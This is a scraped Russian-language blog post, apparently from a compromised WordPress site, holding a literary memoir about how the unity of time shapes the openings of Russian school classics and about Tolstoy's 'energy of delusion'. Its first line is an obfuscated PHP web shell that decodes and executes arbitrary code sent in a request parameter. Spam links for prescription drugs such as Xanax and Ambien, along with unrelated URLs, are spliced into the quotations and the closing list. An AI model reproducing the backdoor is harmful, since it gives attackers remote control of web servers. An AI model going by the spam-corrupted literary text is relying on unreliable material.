nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

“ЭМ””ЦЕ”квадрат РАВНО ЛИ “Е” ?


                       
эпиграф 1

ОТ   ПЕРЕМЕНЫ  МЕСТ  СЛАГАЕМЫХ
СУММА  НЕ  МЕНЯЕТСЯ
                                    мантра  первого  класса
эпиграф 2

http://terranealife.com/unforgettable-hikes-in-scenic-palos-verdes/feed/ БОГ  ДАЛ  ИМ  ЗАКОН, ЧТОБ  ОНИ
УПРАЖНЯЛИСЬ  В  СВОБОДЕ.
                                     Макарий  Египетский

               Классический  закон  триединства  " места,  времени  и  действа " –  это  триада, " три  ада ",  вырваться  из  которой/которых   вплоть  до  19  века  пыталось   всё  искусство   жизнеописательства,  то   есть   драматургия.  Напомню: действие  должно  было  по  этому  закону  развиваться  на  одном  месте  и  в   одном " квадрате "  времени. Но тогда,  естественный  вопрос – какое  же  это   д е й с т в и е, если  оно " тормознутое ", "камерное "? Поэтому  и  стремилось  всё  прогрессивное  человечество  вырваться  из  своей  приземлённой  колыбели,  поскольку  любой  закон  искусителен.
       В  моей  предыдущей  мемории  при  выписывании  первых  строк  школьных  произведений, обнаружилось,  как  их  авторы  продолжали  вырываться  из " камерных "  пут  античного  триединства .  Х о д   действия  задаётся  реальным  д в и ж е н и е м   в  свободном  пространстве  одного  из  главных  персонажей  (или  косвенным,  как  в  случае с  тучками  в  "Дворянском  гнезде ", где  героиня   у х о д и т  в  монастырь ).
    А  сейчас  я  перечислю  эти  же  наши  школьные  произведения,  где пусть  формально,  сохраняется  следующее   условие  триады  –  в р е м я.
   Да-а-а!  Вам  только  глазами  пробежаться  по  перечню  представленных  мною  доказательств,  а  мне  сейчас  тут  колупаться,  их  переписывая  из  каждого  конкретного  литературного  шедевра . . .  Итак,  наши  шольные  произведения,  начинающиеся   с   х о д а     в р е м е н и :

1) " Горе  от  ума " : (зкспозиция)
 ГОСТИНАЯ,  В  НЕЙ   БОЛЬШИЕ   Ч А С Ы . . .(а  далее знаменитое "счастливые  часов  не  наблюдают" )

2)" Евгений  Онегин " : (эпиграф из  Вяземского)
 " И   ЖИТЬ  ТОРОПИТСЯ,  И   ЧУВСТВОВАТЬ    С  П  Е  Ш  И  Т  "

3) " Мёртвые  души ": (первую  главу  мы  в  прошлый  раз  разобрали,  а  теперь  вторая  глава )
    " УЖЕ  БОЛЕЕ   Н Е Д Е Л И   ПРИЕЗЖИЙ  ГОСПОДИН  ЖИЛ  В   ГОРОДЕ."

4)" Ревизор ":(Городничий  вслед  за  репликой "к  нам  едет  ревизор")
   " МНЕ  С Е Г О Д Н Я   ВО  В С Ю   Н О Ч Ь   СНИЛИСЬ  КАКИЕ-ТО  НЕОБЫКНОВЕННЫЕ  КРЫСЫ."

5) " Отцы  и  дети ":
   "…НУ  ЧТО,  НЕ  ВИДАТЬ  ЕЩЁ ?  – СПРАШИВАЛ   Buy Adipex 37.5 Diet Pills 2 0  мая 1853  ГОДА ,  ВЫХОДЯ  БЕЗ  ШАПКИ,  БАРИН..".

6) "Дворянское  гнездо ":
  " ВЕСЕННИЙ  ЛЕТНИЙ    Д Е Н Ь   КЛОНИЛСЯ  К  ВЕЧЕРУ. "

7) " Обломов "
 " ЛЕЖАЛ   У Т Р О М   В   СВОЕЙ  ПОСТЕЛИ  ОБЛОМОВ."

8) " Три  сестры "
  " — ОТЕЦ  УМЕР   Г О Д   НАЗАД . . . (часы   б ь ю т    12 )  И    Т О Г Д А      Т О Ж Е    Б И Л И    Ч А С Ы ."

9) " Вишнёвый  сад ":
   " — ПРИШЁЛ  ПОЕЗД,  СЛАВА    БОГУ.   К О Т О Р Ы Й     Ч А С  ?   –   СКОРО   Д В А  .. ."

10) " Чайка " ( экспозиция )
     ТОЛЬКО  ЧТО  ЗАШЛО  СОЛНЦЕ …

11) " Дядя  Ваня "  (экспозиция ):
 ТРЕТИЙ  ЧАС  ДНЯ,  ПАСМУРНО.

12) " Иванов ": . .
  " –.ВЕРИТЕ  ЛИ,  В  КАКИЕ-НИБУДЬ  ТРИ    Ч А С А   17  ВЁРСТ  ОТМАХАЛ . . ."

13) " Анна  Каренина " : (после  знаменитого  начала  " все  счастливые  семьи  похожи…)
   " НА   Т Р Е Т И Й    Д Е Н Ь   ПОСЛЕ  ССОРЫ  …  В  ВОСЕМЬ  УТРА . . ."

14) " Воскресенье ":  . .
  " Н Ы Н Е Ш Н И Й   ДЕНЬ, http://ajnuest.com/wp-content/plugins/jetpack/css/"https://fonts.googleapis.com/css?family=Open Sans" 2 8  АПРЕЛЯ,  ТРИ  СОДЕРЖАЩИХСЯ  В  ТЮРЬМЕ  ПОДСЛЕДСТВЕННЫЕ  АРЕСТАНТА . .."

15) " Война  и  мир ": .
  "..ТАК  ГОВОРИЛА  В  ИЮЛЕ  1805  ГОДА  ИЗВЕСТНАЯ  АННА  ПАВЛОВНА  ШЕРЕР,  ФРЕЙЛИНА  И  ПРИБЛИЖЁННАЯ  ИМПЕРАТРИЦЫ…"

16) " Братья  Карамазовы ": .
     "….А   ТЕПЕРЬ   К   ДЕЛУ.  АЛЕКСЕЙ   ФЁДОРОВИЧ  КАРАМАЗОВ  БЫЛ  СЫНОМ  ПОМЕЩИКА  АЛ. ФЁД.КАРАМАЗОВА, СТОЛЬ  ИЗВЕСТНОГО  ПО  КОНЧИНЕ  СВОЕЙ    3 0   Л Е Т   НАЗАД  И  О  КОТОРОЙ  СООБЩУ  В  СВОЁМ   МЕСТЕ."

17) " Идиот ":
  "  В    К О Н  Ц  Е    Н О  Я Б Р Я ,  В  ОТТЕПЕЛЬ,  ЧАСОВ  В     Д Е В Я Т Ь    УТРА,    ПОЕЗД   . . . "

18) " Бедные  люди ":
  "  В Ч Е Р А    Я    Б Ы Л   СЧАСТЛИВ  …   ВЕЧЕРОМ,  ЧАСОВ  В  ВОСЕМЬ …  "

     Предыдущюю  мою    м е м о р и ю,  где  говорится  т о л ь к о  о  школьной  литературе, я   смею   называть   с в о е й     меморией ,  так  как  эти,  временами  набившие  оскомину школьные   произведения, как  бы   в с т а в л е н ы   в   наше  сознание,  являются  словно  транспланты,  работающие  в  нашем  сознании  и  конструктивно, и реконструктивно,  а  может, и  дисконструктивно.
      Может, я  приведу  сейчас  и  не  очень  удачный  пример,  но  " из  песни  слова  не  выкинешь ". Определённый  период  литературы  оказал  на  мою  жизнь  очень  сильное  влияние.
      Моя  дорогая  мамочка  при  том,  что  была  партком-профком-месткомЮ,  была  ярой  " к о н т р о й ",  поклонницей  диссидентов  и  "забугорных  голосов ". Я  с  детства  засыпала  под  улюлюканье  радиоволн  и  шум  их  глушилок. Мамочке  нравилось  работать  " на  два  фронта ":  и  как  заслуженной  партайгеноссе  и  как  ярой  антисоветчицей  без  страха  и  упрёка. Всю  эту  советскую  полномочность  своей  "дневной "  жизни   и  радиоосведомлённость  в  методах  репрессий  диссидентов  из  своей  "ночной "  жизни  –  всё  это  она  попробовала  реализавать  на  мне  и  на  " своём  любимом  зяте ". Такие  " вихри  враждебные "  завеяли  над  нами,  что,  как  говорится " мама  не  горюй " ! . . Об  этом   следующие  мемории,  а  сейчас . . .
    У  Льва  Николаевича  Толстого  есть  его  " фирменное "  выражение: ЭНЕРГИЯ   ЗАБЛУЖДЕНИЯ.  Пара  слов  о  ней  и  о  себе.
    Как-то,  на  грани  нашего  переезда  из  Петербурга  в  Теребени,  муж  подарил  мне  книжку  В.Б Шкловского  о  кино. Надо  сказать,  что  муж  очень  любил  покупать  книги,  но  не  всегда  их  читал. Я  же, читая  подаренную  книгу,  удивлялась  что  автор  часто  употребляет  выражение  "энергия  заблуждения ",  и  явно  это    ч ь ё – т о   цитированное  выражение  беспардонно  не  " заковычивает " . И  я  не  заблуждалась.
     Войдя  в  исследовательский  азарт, я  позвонила  к  недавно  к  нам  в  Теребени  приезжавшему  А.Ю.Арьеву.  Я  его  спросила,  кому  принадлежат  незаковыченные  слова  про  энергию  заблуждения ?.  Андрей  Юрьевич  мгновенно   мне  ответил,  что  это  сказал  Л.Н.Толстой  в  письме  к  Страхову,  и  что  надо    з н а т ь   таких  выдающихся  соотечественников,  как  Н.Н.Страхов. Тут  я  вспомнила,  что  при  Политехническом  институте  в  Петербурге  есть  философское  общество  имени  Страхова  –  только  и  всего.  Мало  того, Арьев  сказал,  что  Шкловским   даже  написана  книга   с  таким  названием  " Энергия  заблуждения ",  и  что  надо  мне  взять  её  в  библиотеке.  Что  я  и  сделала. Правда,  из  нашей  районной  библиотеки  по  этой  книге    сделали,  по  моей  просьбе, запрос в  областную  библиотеку.  Но  кто  ищет  энергию, тем  более  –  заблуждения  –  того  она  сама  найдёт ! (шутка).  Короче,  прочитала  я  присланную  мне  книгу,  впечатлилась, "подковалась "  –  а  теперь  и  вас  "заблуждаю ".
    После  этого  я  снова  не  поленилась, снова  пошла  в библиотеку  и  нашла  в  собрании  сочинений  Толстого  это  его  письмо  к  Страхову. В  ответ  на  призыв  последнего  скорее  дописывать  "Анну  Каренину",  которая  у  Толстого  сильно  затормозилась.  Толстой  пишет  в  ответ,  что,  мол,  нет  у  него   т о й   нужной   для  творчества  энергии   з а б л у ж д е н и я ,  которая  является  двигателем  всего  процесса.  То  есть  под   " энергией  заблуждения "  Толстой  подразумевает   в д о х н о в е н и е.  Удивительно !
    Так  же  интересным  поворотом  мысли  меня  в   ещё  в  начале  нашего  знакомства  поразил  и  мой  Георгий.
    Как  я  говорила, я  с  ним  встретилась,  придя  собирать  декорации  в  Александринском (тогда –  Пушкинском)  театре. Я  пошла  туда  практически  изучать  театр,  так  сказать, " снизу ",  а   Георгий,  по  своей  наивности,  хотел  идти  в  театральные  художники  и  даже  пошёл  на  подготовительные  курсы  к  тогда  ещё  совсем  молодому  Кочергину.  Я  сказала "  по  наивности " –   потому  что  он  не  обладал  той  профессиональной  базой  и  усидчивостью,  которые  необходимы  были  для  этого  адского  труда  (компьютеров  ещё  не  было  –  и  надо  было  все " художества ",  вплоть  до  филигранных  макетов  делать  вручную. Как  в  актёрском  ремесле  "дежурное  блюдо " – этюды,  так  же  и   в  художественно-оформительском ремесле  необходимо  " натаскивание " на  концептуальную  находчивость: даётся  и д е я,  а   её  надо  оригинально  разработать.
    У  Георгия  было  задание оригинально  изобразить . .  Т И Р ,  да-да,  лавочка,  куда  приходят  и  пуляют  во  всякие  штучки  на  плоскости  стены.
    Георгий  тщательно  вырисовывал  детальки  каждой  вещицы,  многообразие  которых  известно  любому  и  каждому.  Он  нарисовал   Т И Р   " У Б Е Й    В Р Е М Я ":
на  полочках,  как  в  антикварной  лавке,  располагались  всяко  разные  будильники,  ходики,  циферблаты . . .
    Вообще-то данная  тема  под  " п р и ц е л о м "  о.Георгия  –  оказалась  философским  осмыслением  этого  временного  элемента  триады ( место – время – действие ) н а ш е й   з е м н о й   ж и з н и  !
      http://stoemper.com/story/                                                +
Order Alprazolam Online From Canada              петр  иоанн  андрей
Cheap Generic Klonopin филипп  фома  варфоломей
Buy Xanax Prescription Online              два иакова  матфей
иуда яковль,т.е. http://allovermedia.com/our-team/ ф а д д е й
http://soligenix.com/?p=1584 Order Cheap Ambien   зилота симон   и  матфий

              


Добавить комментарий